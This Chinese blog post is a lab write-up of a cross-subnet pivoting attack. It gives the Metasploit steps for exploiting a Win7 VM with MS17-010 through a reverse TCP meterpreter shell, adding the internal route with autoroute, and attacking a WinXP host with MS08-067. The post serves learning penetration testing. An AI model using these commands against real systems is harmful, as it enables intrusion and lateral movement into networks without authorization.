跨网段攻击

1、实验内容

      模拟使用kali作为攻击机通过外网渗透win7,并把win7作为跳板,攻击内网中的winxp

2、实验准备

靶机:win7(双网卡):192.168.44.164(NAT)+10.10.10.129(仅主机模式)
           winxpsp3:10.10.10.128(仅主机模式)
攻击机:kali:192.168.44.165(NAT)

实验开始前,需要配置所需的环境:
     1.这里kali使用NAT模式,作为外网的攻击机,通过ifconfig获取IP地址。

     2. 配置内网:在VM虚拟机中新建一个虚拟网段Vmnet2,并设置为仅主机模式:
在这里插入图片描述
win7虚拟机作为kali的攻击跳板,需要设置两个虚拟网卡,其中一个设置为刚刚设置为仅主机模式:
在这里插入图片描述
然后将目标机winxp也设置在同一网段:
在这里插入图片描述
这里实验所需要的环境就算配置完成了。

3、渗透攻击环节

这个实验的重点是跨网段攻击,所以就前面的渗透攻击win7不做过多的演示:

3.1kali通过永恒之蓝ms17-010攻击win7

● search ms17-010 //通过nmap扫描到445端口,搜索ms17-010这个漏洞相关的脚本
● use 0 //使用攻击脚本 //kali系统里面在/usr/share/metasploit-framework/modules/目录下能看具体载荷的代码,后边根据具体脚本而定
● set rhost ip地址 // 设置目标的IP地址、我们需要攻击的地址
● set lhost ip地址 //kali的IP地址
● set payload windows/x64/meterpreter/reverse_tcp // 设置基于TCP反向连接的攻击载荷
● run //执行攻击

在这里插入图片描述

可以看到我们已经攻击成功了。这里可以使用一些命令:

1、screenshot(获取屏幕快照)
2、上传文件到Windows主机:upload /root/csb666.jpg c://csb666.jpg
3、从Windows主机中下载文件到kali中:download d:/meishaonv.jpg /root

3.2 shell模块进行远程登录

首先我们可以查看它的IP:
在这里插入图片描述
如果查看的结果是乱码,输入chcp 65001就可以显示正常。我们可以发现,win7这台机器有两个网卡,发现还有一个10.10.10.x的网段,那我们可以查看是否存在其他ip:
在这里插入图片描述

arp -a参数的含义就是通过询问当前协议数据,显示当前 ARP 项。如果指定 inet_addr,则只显示指定计算机的 IP 地址和物理地址。如果不止一个网络接口使用 ARP,则显示每个 ARP 表的项。可以在命令窗口输入arp /?查看具体说明。

我们可以看到在内网中还有一个ip,这个就是要攻击的winxp,通过win7给攻击机kali分配一个网段(将内网段添加到路由):
在这里插入图片描述

查看路由映射情况:run autoroute -p
在这里插入图片描述
这个时候已经实现了给kali分配一个ip,使得kali可以和winxp进行连接。然后就可以对winxp进行渗透攻击。

4、跨网段攻击 kali——>winxp

使用ms08-067对winxp进行攻击,同kali攻击win7一样:
在这里插入图片描述
这里需要注意的是payload只能正向连接,因为winxp是ping不同kali,而kali能ping同winxp。整个跨网段攻击就是这样,这里面通过kali对win7和winxp都挺容易,只需要用已发现的漏洞进行渗透测试,主要是将内网段添加至路由表对于小白来说很陌生。这个实验主要分享学习心得,体会攻击的过程所以不会涉及太多NB的操作。
在这里插入图片描述

  • 3
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值